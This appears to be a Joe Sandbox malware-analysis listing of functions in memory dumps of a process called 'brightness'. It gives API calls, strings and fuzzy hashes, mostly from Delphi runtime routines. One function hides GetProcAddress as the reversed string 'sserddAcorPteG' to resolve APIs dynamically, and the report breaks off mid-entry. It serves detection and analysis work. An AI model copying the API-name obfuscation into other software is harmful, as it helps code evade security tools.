Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 894e6c3a0c67a22e887283c7d006a940379aec06db194338150348707d3ab506
Instruction ID: 3aea0dfc9d191c39b0b57a027146e353195492ef7e03e99d2581bec89c0ebdd0
Opcode Fuzzy Hash: 894e6c3a0c67a22e887283c7d006a940379aec06db194338150348707d3ab506
Instruction Fuzzy Hash: 49F0B2BC9443219FD351DF28D941A167BE9FB48B14F408D69EA9DC7380E7389A24CF92

Function 0283A790 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0283BDF2,00000000,0283C00B,?,?,00000000,00000000), ref: 0283A7A3

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
Instruction ID: 34f36e2bc67de603a562e1c7b1a69915cd48344d8db28b32d5adb6ce0a51096f
Opcode Fuzzy Hash: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
Instruction Fuzzy Hash: 84D05EAE30F2603AA229915E2D84D7B5AFCCAC57A1F00443EF5C8C6201E2048C0596F1

Function 0283918C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 02839190

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
Instruction ID: 36279ed80754645ce8ca8595f2490d50e495cf1bcaff86714ca6c0c592f342b0
Opcode Fuzzy Hash: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
Instruction Fuzzy Hash: EEA01108808C30228A803B2E0C0223A3088A800A20FC80F80A8F8802E2FE2E022080EB

Function 0285E59A Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e002b26f6a8d93b15f6b1e3d75dfc211822e6c8fac250ba06e4d1a1fecda0df
Instruction ID: cd397babba7f66eb2f3f365372ac77495c2686ddc38262b456dcd1a7f655aa70
Opcode Fuzzy Hash: 0e002b26f6a8d93b15f6b1e3d75dfc211822e6c8fac250ba06e4d1a1fecda0df
Instruction Fuzzy Hash: 7851F66A80D3D28FC7438F7488643917FF1AF13665B0E01DAC8948F4A3D369599ADB12

Function 028320C4 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Function 0283D214 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0283D21D

Part of subcall function 0283D1E8: GetProcAddress.KERNEL32(00000000), ref: 0283D201

Strings

VarR4FromStr, xrefs: 0283D35F
VarCyFromStr, xrefs: 0283D3A1
VarSub, xrefs: 0283D283
VarMod, xrefs: 0283D2DB
VarOr, xrefs: 0283D307
VarBstrFromDate, xrefs: 0283D3E3
oleaut32.dll, xrefs: 0283D218
VarAdd, xrefs: 0283D26D
VarI4FromStr, xrefs: 0283D349
VarIdiv, xrefs: 0283D2C5
VarNeg, xrefs: 0283D241
VarMul, xrefs: 0283D299
VarAnd, xrefs: 0283D2F1
VarR8FromStr, xrefs: 0283D375
VarCmp, xrefs: 0283D333
VarDateFromStr, xrefs: 0283D38B
VarBoolFromStr, xrefs: 0283D3B7
VarDiv, xrefs: 0283D2AF
VarXor, xrefs: 0283D31D
VarBstrFromBool, xrefs: 0283D3F9
VarNot, xrefs: 0283D257
VariantChangeTypeEx, xrefs: 0283D22B
VarBstrFromCy, xrefs: 0283D3CD

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 6d1f206e252167347e941985f15385ecdaacf8dfbcfb26eaf99b84c2ed743c9a
Instruction ID: ee1b519ce8cc53fd7a47846d70c711306e4c4a6329b6a7d6d8613ba89ef5890a
Opcode Fuzzy Hash: 6d1f206e252167347e941985f15385ecdaacf8dfbcfb26eaf99b84c2ed743c9a
Instruction Fuzzy Hash: 88410F6D9852086B560B6BAD740042BFFDED7C87203A4C41BFA04DB744DDF0BD594AEA

Function 02846E58 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ole32.dll), ref: 02846E5E
GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02846E6F
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02846E7F
GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02846E8F
GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02846E9F
GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02846EAF
GetProcAddress.KERNEL32 ref: 02846EBF

Strings

ole32.dll, xrefs: 02846E59
CoReleaseServerProcess, xrefs: 02846E99
CoAddRefServerProcess, xrefs: 02846E89
CoSuspendClassObjects, xrefs: 02846EB9
CoResumeClassObjects, xrefs: 02846EA9
CoInitializeEx, xrefs: 02846E79
CoCreateInstanceEx, xrefs: 02846E69

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
API String ID: 667068680-2233174745
Opcode ID: 7a98a98b2a7881bcf359bf67d752de142c22929c404a0c36fd7643cd8b57164f
Instruction ID: 8354288c0052c25536667881d4c47c9193259bfed2f337bf16dcb789f3e3fd01
Opcode Fuzzy Hash: 7a98a98b2a7881bcf359bf67d752de142c22929c404a0c36fd7643cd8b57164f
Instruction Fuzzy Hash: 54F098ECA847397FB3037F799C818272A9DA911A843101825B402E5A43FF7D85204BA6

Function 02832530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 028328CE

Strings

7, xrefs: 028326A1
bytes: , xrefs: 0283275D
String, xrefs: 028327A1
Unexpected Memory Leak, xrefs: 028328C0
An unexpected memory leak has occurred. , xrefs: 02832690
The unexpected small block leaks are:, xrefs: 02832707
, xrefs: 02832814
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02832849
Unknown, xrefs: 0283278C

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: 452328d32743a9ed4e1fa2e2287935ec56f9009a72f59bd227ba62f342e018aa
Instruction ID: 7aadf08f899fde738ecdb46a7d4f722feaf40c2f76b1d0daaf748deafe315b4f
Opcode Fuzzy Hash: 452328d32743a9ed4e1fa2e2287935ec56f9009a72f59bd227ba62f342e018aa
Instruction Fuzzy Hash: 36A1E73CA042648BDF22AA2CCC80B9876E5EB09714F1441E5DD4DDB28ADB759D89CFD1

Function 0283252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

7, xrefs: 028326A1
bytes: , xrefs: 0283275D
Unexpected Memory Leak, xrefs: 028328C0
An unexpected memory leak has occurred. , xrefs: 02832690
The unexpected small block leaks are:, xrefs: 02832707
, xrefs: 02832814
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02832849

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: 307804e9ce5726b5b5d16bb82acdb099c64d235aa66def06a7c01f6e0d88ffea
Instruction ID: 6d7a8cceb799b7d1a62fc40c1412b3ae31e2657fbf4d1eba4ba9d4be3792f6fc
Opcode Fuzzy Hash: 307804e9ce5726b5b5d16bb82acdb099c64d235aa66def06a7c01f6e0d88ffea
Instruction Fuzzy Hash: 7A71B53CA042A88EDB22AA2CCC84BD8B6E5FB09714F1041E5D94DDB289DBB54DC5CF91

Function 0283BD40 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,0283C00B,?,?,00000000,00000000), ref: 0283BD76

Part of subcall function 0283A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0283A762

Strings

AMPM , xrefs: 0283BF99
mmmm d, yyyy, xrefs: 0283BE72
AMPM, xrefs: 0283BF8A
m/d/yy, xrefs: 0283BE45
:mm, xrefs: 0283BFA9
:mm:ss, xrefs: 0283BFC6

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: e387c228e00c7ae84af1e26c5221565a626374782c467a4fd7af0f5fd72d79f3
Instruction ID: 904811851741db354d1b525006af48e229712309dde1ac25e41f51703ed91ee9
Opcode Fuzzy Hash: e387c228e00c7ae84af1e26c5221565a626374782c467a4fd7af0f5fd72d79f3
Instruction Fuzzy Hash: 2961723DB002499BDB07EBA8D8A0A9FB7B7DB48300F109435D241EB745CA79D9099BD2

Function 0284AE18 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 0284AE38
GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 0284AE4F
IsBadReadPtr.KERNEL32(?,00000004), ref: 0284AEE3
IsBadReadPtr.KERNEL32(?,00000002), ref: 0284AEEF
IsBadReadPtr.KERNEL32(?,00000014), ref: 0284AF03

Strings

KernelBase, xrefs: 0284AE4A
LoadLibraryExA, xrefs: 0284AE45

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: Read$HandleModule
String ID: KernelBase$LoadLibraryExA
API String ID: 2226866862-113032527
Opcode ID: 3b9c99411079d94161202a36cac2dccca9e9d0c9eddd0d93515469b0ae116070
Instruction ID: c962fd0aae280dee3e1595caafe2af9485ec16a94ee633f00be75f13d8922567
Opcode Fuzzy Hash: 3b9c99411079d94161202a36cac2dccca9e9d0c9eddd0d93515469b0ae116070
Instruction Fuzzy Hash: 163162BD680209BBEB14DF6CCC95F5A77A8AF04768F044510FA58DF281EB34E940CBA5

Function 0283432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028343F3,?,?,028917C8,?,?,0285E7A8,0283655D,0285D30D), ref: 02834365
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028343F3,?,?,028917C8,?,?,0285E7A8,0283655D,0285D30D), ref: 0283436B
GetStdHandle.KERNEL32(000000F5,028343B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028343F3,?,?,028917C8), ref: 02834380
WriteFile.KERNEL32(00000000,000000F5,028343B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028343F3,?,?), ref: 02834386
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 028343A4

Strings

Runtime error at 00000000, xrefs: 0283435E, 0283439D
Error, xrefs: 02834398

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 5bd001a549db5c2d8d55a62a0dc473c2750efabe17ea7081d5f4ff51a9cfeb51
Instruction ID: 1d7e8d07438f12b6587c0b80b67c70ffce2d67df4495449314c474dead214a81
Opcode Fuzzy Hash: 5bd001a549db5c2d8d55a62a0dc473c2750efabe17ea7081d5f4ff51a9cfeb51
Instruction Fuzzy Hash: 99F0906DAC434479FA12B768AC09F9D275C5B54F25F584A05B728E54C087F890C48BE7

Function 0283AE44 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0283ACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0283ACD9
Part of subcall function 0283ACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0283ACFD
Part of subcall function 0283ACBC: GetModuleFileNameA.KERNEL32(02830000,?,00000105), ref: 0283AD18
Part of subcall function 0283ACBC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0283ADAE

CharToOemA.USER32(?,?), ref: 0283AE7B
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0283AE98
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0283AE9E
GetStdHandle.KERNEL32(000000F4,0283AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0283AEB3
WriteFile.KERNEL32(00000000,000000F4,0283AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0283AEB9
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0283AEDB
MessageBoxA.USER32(00000000,?,?,00002010), ref: 0283AEF1

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: afe93563a03406f422ba4acc5b057d4042c93e41bf501da6c982710ef8a03ccb
Instruction ID: 4a3197cbefb70b90d94adffd76d8d8ed89f386ef7dab874561a2b4aef9602cc2
Opcode Fuzzy Hash: afe93563a03406f422ba4acc5b057d4042c93e41bf501da6c982710ef8a03ccb
Instruction Fuzzy Hash: 201170BE5482047AD202EBACCC84F9B77EDAB44340F400A19B794D61D0EA74E9448BAB

Function 0283E50C Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0283E5A5
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0283E5C1
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0283E5FA
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0283E677
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0283E690
VariantCopy.OLEAUT32(?,00000000), ref: 0283E6C5

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction ID: 42b550e251230eab46b49b95e46f6e735413850a7c84e6d6b3cc289f3b6de8d8
Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction Fuzzy Hash: BD51C67D9016299BCB22DB58CC80BD9B3BDAF4D304F0441D5EA09E7216DB70AF858FA5

Function 02833568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0283358A
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,028335D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028335BD
RegCloseKey.ADVAPI32(?,028335E0,00000000,?,00000004,00000000,028335D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028335D3

Strings

FPUMaskValue, xrefs: 028335B4
SOFTWARE\Borland\Delphi\RTL, xrefs: 02833580

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 8029c029ec102b1befa72643de981d810a7b76d32686c9a9c6af198e7ea11170
Instruction ID: 78b604fdc220d0ef95323b7d7b2111dece82f12b08b17b776071228adc120f7e
Opcode Fuzzy Hash: 8029c029ec102b1befa72643de981d810a7b76d32686c9a9c6af198e7ea11170
Instruction Fuzzy Hash: F501B57E940318BAEB12DB90CD02BBD77ECEB08B10F1005A1FA04D6680F678A610DAD9

Function 028480C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02848148,?,?,00000000,00000000,?,02848061,00000000,KernelBASE,00000000,00000000,02848088), ref: 0284810D
GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02848113
GetProcAddress.KERNEL32(?,?), ref: 02848125

Strings

Kernel32, xrefs: 02848108
sserddAcorPteG, xrefs: 028480DB

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: Kernel32$sserddAcorPteG
API String ID: 667068680-1372893251
Opcode ID: 21e491190d42c769f91ff813b7f8646dda5a3a90a9662783e9b74b9a3a2fbe63
Instruction ID: 139e6bc143e9c260f82f558c1ce89e81bbaa64bbb4400efd062b3039b4f526dc
Opcode Fuzzy Hash: 21e491190d42c769f91ff813b7f8646dda5a3a90a9662783e9b74b9a3a2fbe63
Instruction Fuzzy Hash: FF01D63CA4030CBFE702EFA8DC41E5EB7EEEB49710F514861F900D7750EA74A9049A55

Function 0283A9D0 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

